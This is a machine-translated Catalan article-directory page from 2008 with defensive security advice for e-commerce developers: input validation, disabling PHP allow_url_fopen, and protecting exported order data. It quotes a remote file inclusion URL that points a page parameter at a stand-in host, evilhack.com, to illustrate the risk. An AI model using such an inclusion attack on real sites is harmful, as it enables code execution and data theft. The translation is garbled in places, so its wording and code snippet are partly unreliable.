The following content has been automatically translated by close 
E-Commerce Security - tapar els forats de seguretat | Un article de comerç electrònic
Article Esfera Logo
"" Comerç electrònic "de l'article
Article Directory Home Totes les categories Internet i E-Business Comerç electrònic

E-Commerce Security - tapar els forats de seguretat

Per Autor d'Experts: Paul Roberts | Resum de l'article
Word Count: 520 paraules | Vistes: 120 View (s)
De seguretat en un lloc de comerç electrònic ha de ser una consideració important al desenvolupament d'un lloc de comerç electrònic o de programari. Un programador ha de ser conscient de totes les consideracions de seguretat en el disseny d'un lloc. Amb el comerç electrònic cada vegada més comuns en aquests dies, el nombre d'atacs a la seguretat és, sens dubte cada vegada major. La paranoia és una cosa saludable per a desenvolupadors de llocs d'e-comerç, hem de mantenir a la porta amb qüestions de seguretat, i mantenir a les nostres oïdes i els ulls oberts. Tot i les llacunes següents són greus, les llacunes següent si està present es pot arreglar fàcilment.

A continuació s'enumeren algunes consideracions de seguretat que s'inclouran en el desenvolupament d'un lloc. Aquest article no inclou i-robatori, si us plau, veure el meu article separat sobre això.

L'entrada de l'usuari - cada entrada, ja sigui entrant en una quantitat, la recerca d'un producte, entrar en un nom, etc, ha de ser validat per personatges sospitosos. Si això no es fa, és possible entrar "?>", les etiquetes de tancament de final de PHP i executar codi PHP.

És molt més segur permetre que els números i caràcters az (capitals incloses) i 0-9, i res més, en lloc de fer una llista de tot el caràcter que no hauria de ser-hi. La seqüència d'ordres de validació de les necessitats per desplaçar-se a través de cada personatge un per un. Això s'ha d'aconseguir mitjançant la validació del costat del servidor, no Javascript. Amb la banda de servidor de validació d'entrada és essencial per mantenir fora caràcters no desitjats

Hi ha una altra important quan l'execució de codi PHP. Quan es fa servir PHP és un escenari anomenat allow_url_fopen que permet l'obertura de fitxers des d'un script PHP. Aquest valor ha d'estar apagat, a menys que sigui absolutament necessari.

Imagini's vostè té scripts PHP per a les capçaleres i peus de pàgina fixa, i per accedir a les seves pàgines web que escriuria a http://www.mysite.com/index.php?page=page2. Tot el que necessita és un usuari maliciós executar un script mitjançant la modificació d'aquests paràmetres, escrivint "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" amb la una mica de codi PHP a l'arxiu "hacker.txt". Vostè podria tenir res passi, arxius PHP llegir, esborrar, informació vital robats.

Si vostè no està segur de si aquesta opció està activada o desactivada, si us plau copieu el següent codi PHP en un arxiu de text, i pujar-lo al teu servidor web:

phpinfo ();
?>

Quan té accés a la seqüència de comandaments en el seu servidor web, ha de venir a través de l'establiment de allow_url_fopen en la configuració.

Un usuari de l'ordinador, en circumstàncies normals no pot trobar el valor d'aquesta configuració.

Aneu amb compte amb les dades exportats, com comandes, productes en CSV i mySQL. Si aquestes dades s'exporta des d'un script i es manté a la web sota un comú, és a dir el nom d'arxiu. http://www.mysite.com/admin/output_tables.csv. Que això només és un problema quan les dades exportats resideix en un fitxer en un directori que és accessible al públic. Hi ha dues maneres de prevenir aquesta llacuna en la seguretat - En primer lloc té el fitxer de sortida darrere d'un directori protegit amb contrasenya, en segon lloc tenim les dades ubicats dins d'un formulari element d'àrea de text HTML en un script. El propietari de la botiga continuació, pot copiar aquesta informació del fitxer de text i crear un nou fitxer a l'ordinador i enganxar la informació aquí.

Tot el que necessita és un hacker per trobar aquest nom de fitxer en revisar el lloc d'e-demo del programari de comerç i buscar el mateix nom de fitxer en un lloc real.
Paul Roberts

Sobre l'autor / Autor Bio

Paul Roberts
Dirigeixo una empresa de desenvolupament de software especialitzada en E-Commerce, Search Engine Optimization, impressió i software d'estimació de trucada ROBATORI Design Solutions. També desenvolupen Nova Zelanda E-Commerce Solutions i programari sota el nom de ROBATORI Disseny.

Article Source: http://www.ca.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Tags: e-commerce, ecommerce, security, loophole, loopholes, plugging, secure, validation

Article Submitted: 2008-06-05 | This Article has been viewed 120 times.

Rate Article

Related Videos

Play Video
How to Strengthen Network Security with Cisco Network Manager
Play Video
Understanding your Home Network Router #5 - Secure Your Network with WPA2
Play Video
Learn About Secure Computing
Play Video
Com mantenir l'equip protegit
Play Video
Com comprovar la configuració de seguretat en Windows Vista

"Més de comerç electrònic" Articles Relacionats

A continuació s'esmenten més articles relacionats amb l'article anterior de la categoria "Comerç Electrònic" de l'article.

Les persones interessades en l'article anterior "E-Commerce Security - tapar els forats de seguretat" també estan interessats en els articles relacionats que figuren a continuació:

Execució d'una empresa de comerç electrònic no és només de mantenir el seu lloc web en funcionament. Els clients confien en la seva capacitat de servir a ells a través de telèfon, fax, correu electrònic o altres mitjans, i requereix de tots els seus sistemes d'estar treballant per poder complir les peticions del client.
Només un parell de dies enrere jo estava tenint una xerrada amb el meu amic. S'estava celebrant l'1 del seu nadó d'aniversari i va haver de córrer entre el seu país natal, a Kerala i Chennai, el seu lloc de treball. Ell i la seva millor mitjà recorregut entre aquests llocs com a mínim 4 vegades en l'últim mes.
Si vostè ha estat fent comerç electrònic per a qualsevol quantitat de temps, s'hauria assabentat que hi ha més de scamers d'efectiu dels proveïdors de serveis de directori a l'engròs nau. En el món dels negocis electrònics, SaleHoo i marques a nivell mundial són els proveïdors de serveis de reputació que han guanyat popularitat en els darrers anys.
Si alguna vegada ha estat un detallista en línia, probablement ja han sentit a parlar de SaleHoo o fins i tot el va utilitzar per al seu avantatge. Si vostè està acabada començant amb el seu negoci, vostè podria ser confós amb el SaleHoo mixt d'avaluació que hi ha. Ara, donem una ullada al que SaleHoo que realment és i els serveis que ofereixen el que molts tendeixen a passar per alt.
Quanta gent sap que han comprat alguna cosa a Internet? Si tu com jo, molt pocs, és per això que el comerç electrònic és nova en el món un centre comercial en línia. Però, qui dirigeix aquestes botigues al detall en línia? Persones com vostè i jo, per això aquest negoci està creixent i continuarà creixent ara i en el futur.
Si vostè és un gran fan dels últims productes d'electrònica, vostè pot ser temptat per la idea de portar la seva pròpia línia de negoci de l'electrònica. No és tan difícil per començar quan vostè pren l'avantatge completa de la caiguda de dret marítim de serveis electrònics i hi ha un munt per tu per triar.
Alguna vegada en la seva botiga local i em pregunto què seria com si de propietat d'ella? Vols ser propietari d'una bona voluntat de la gent com tu? Bé aquest article et mostrarà els beneficis de ser amo de la seva pròpia botiga en línia, o comunament conegut com el comerç electrònic que difereix d'una botiga de conveniència real local.
Article Directory Home Totes les categories Internet i E-Business Comerç electrònic

No pot trobar el que buscaves? Prova Google Search!
(Le servimos a tot el món - Llocs actualitzada al diumenge, 06 de diciembre 2009 04:54 pm, Singapur)
Estats Units d'Amèrica, EUA. Regne Unit, Regne Unit (Anglaterra, Escòcia, Gales, Irlanda del Nord). Canadà. Afganistan. Albània. Algèria. Samoa Nord-americana. Andorra. Angola. Anguila. L'Antàrtida. Antigua i Barbuda. Argentina. Armènia. Aruba. Austràlia. Àustria. Azerbaidjan. Bahames. Bahrain. Bangla Desh. Barbados. Bielorússia. Bèlgica. Belize. Benín. Bermudes. Bhutan. Bolívia. Bonaire. Bòsnia i Hercegovina. Botswana. Brasil. Illes Verges Britàniques. Brunei. Bulgària. Burkina Faso. Burundi. Cambodja. Camerun. Cap Verd. Illes Caiman. La República Centreafricana. Txad. Illes del Canal. Xile. Porcellana. Illa de Nadal. Colòmbia. Comores. Congo. Congo (Rep. Dem). Illes Cook. Costa Rica. Côte d'Ivoire. Croàcia. Cuba. Curaçao. Xipre. República Txeca. Dinamarca. Djibouti. Dominica. República Dominicana. Timor Oriental. Equador. Egipte. El Salvador. Guinea Equatorial. Eritrea. Estònia. Etiòpia. Illes Malvines i dependències. Illes Fèroe. Fiji. Finlàndia. França. Francès de Guaiana. Francès Polinèsia. Gabon. Gàmbia. De Gaza. Geòrgia. Alemanya. Ghana. Gibraltar. Grècia. Groenlàndia. Granada. Guadalupe. Guam. Guatemala. Guinea. Guinea Bissau. Guyana. Haití. Illes hawaianes. Hondures. Hong Kong. Hongria. Islàndia. Índia. Indonèsia. Iran. Iraq. Illa de Man Israel. Itàlia. Costa d'Ivori. Jamaica. Japó. Atol de Johnston. Jordània. Kazakhstan. Kenya. Kiribati. Corea (Nord). Corea (del Sud). Kuwait. Kirguizistan. Laos. Letònia. Líban. Illes de Sotavent. Lesotho. Libèria. Líbia. Liechtenstein. Lituània. Luxemburg. Macau. Macedònia. Madagascar. Malawi. Malàisia. Maldives. Mali. Malta. Illes Marshall. Martinica. Mauritània. Maurici. Mèxic. Micronèsia (Estats Federats). Atol Midway. Moldàvia. Mònaco. Mongòlia. Montserrat. Marroc. Mosquito Coast. Moçambic. Myanmar (Birmània). Namíbia. Nauru. Navassa Island. Nepal. Països Baixos. Antilles Neerlandeses. Nova Caledònia. Nova Zelanda. Nicaragua. Níger. Nigèria. Niue. Illa de Norfolk. Illes Mariannes del Nord. Noruega. Oman. Pakistan. Palau. Palestina. Panamà. Papua Nova Guinea. Illes Paracel. Paraguai. Perú. Filipines. Illes Pitcairn. Polònia. Portugal. Puerto Rico. Qatar. Reunió. Romania. Rússia. Rwanda. Illes Ryukyu. Santa Elena. Saint Kitts i Nevis. Santa Llúcia. Saint Pierre i Miquelon. Saint Vincent i les Grenadines. Samoa. San Marino. São Tomé i Príncipe. Aràbia Saudita. Senegal. Sèrbia. Seychelles. Sierra Leone. Singapur. Eslovàquia. Eslovènia. Illes Salomó. Somàlia. Sud-àfrica. Espanya. Sri Lanka. Sudan. Surinam. Swazilàndia. Suècia. Suïssa. Síria. Taiwan. Tadjikistan. Tanzània. Tailàndia. Togo. Tonga. Transkei. Trinitat i Tobago. Tunísia. Turquia. Turkmenistan. Illes Turks i Caicos. Tuvalu. Illes Verges dels EUA. Uganda. Ucraïna. Emirats Àrabs Units. Volta Superior. Uruguai. Uzbekistan. Vanuatu. Ciutat del Vaticà (Santa Seu). Veneçuela. Vietnam. Illa de Wake. Illes de Sotavent. Iemen. Iugoslàvia. Zaire. Zàmbia. Zimbabwe
Copyright © 2005 -- per Larry Lim, Singapur - article Directori de cercadors a ArticleSphere.com ™
Tots els Drets Reservats. Totes les marques i de sericios són propietat dels seus respectius propietaris.

Afrikaans Albània Àrab Bielorússia Búlgar Català Xinès (simplificat) Xinès (tradicional) Croàcia Txeca Danès Alemany Anglès Estònia Filipino Finès Francès Galícia Grec Hebreu Hindi Hongarès Islàndia Indonèsia Irlanda Italiano Japonès Corea Letònia Lituà Macedònia Malai Malta Neerlandès Noruega Persa Polonès Portuguès Romanès Rússia Sèrbia Eslovaca Eslovènia Español Suahili Suec Tailàndia Turquia Ucraïna Vietnamita Galés Yiddish